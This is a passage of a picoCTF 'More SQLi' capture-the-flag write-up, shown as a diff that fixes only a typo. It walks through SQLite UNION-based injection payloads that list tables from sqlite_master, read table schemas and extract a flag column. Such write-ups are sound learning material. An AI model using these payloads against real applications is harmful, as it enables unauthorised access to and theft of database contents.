Cowne/wr1t3_up/picoCTF/More_SQLi/More_SQLi.md

 The first thing we extract is how many tables and name of them.
 So I use the payload ==Algiers' UNION SELECT (SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),NULL, NULL --==

 <img src = "img/img10.png">

 And we can see the list tables in the database.
 Now we want to extract columns in each tables. the payload ==SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'== help us to do this and we have the payload like this ==Algiers' UNION SELECT (SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='hints'),NULL, NULL --==
 The above payload will extract the columns of ==hints== table.

 <img src = "img/img11.png">

 With a little bit logic, we can guest that the ==hints== table has 2 columns ID and info.

 You can repeat it until you see the ==flag== column.
 And you want to extract the value of the column, use this payload ==Algiers' UNION SELECT flag,NULL, NULL from <name_of_the_table> --==

 <img src ="img/flag.png">

-Congrat, you found the flaggggg.
+Congrats, you found the flaggggg.

 THANK YOU FOR LEARNING GUYS.
 PATIENCE IS THE KEY, SO KEEP TRYING EVERYDAY.
 LUV U <3